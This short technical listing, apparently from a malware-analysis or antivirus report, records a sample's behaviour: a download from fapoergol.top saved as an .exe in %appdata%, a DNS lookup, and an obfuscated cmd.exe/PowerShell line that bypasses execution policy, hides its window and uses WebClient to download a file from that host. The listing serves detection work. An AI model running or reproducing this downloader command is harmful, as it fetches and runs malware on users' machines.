Technical Information
- http://www.fapoergol.top/read.php?f=1.gif as %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^oWERS^h^e^ll.Exe -^ExECUT^i^oNp^OlI^CY ^B^ypaSs -^n^O^prO^FiLe^ -wIND^ow^S^T^Y^LE^ ^hIdDEN ^(N^ew-OB^jEc^t sY^st^eM.^n^ET.^WEBCL^i^eN^t).d^O^wNl^O^ADFILe('http://www.fapoe...
- DNS ASK fa###rgol.top
- '<SYSTEM32>\cmd.exe' /C "p^oWERS^h^e^ll.Exe -^ExECUT^i^oNp^OlI^CY ^B^ypaSs -^n^O^prO^FiLe^ -wIND^ow^S^T^Y^LE^ ^hIdDEN ^(N^ew-OB^jEc^t sY^st^eM.^n^ET.^WEBCL^i^eN^t).d^O^wNl^O^ADFILe('http://www.fapoe...' (with hidden window)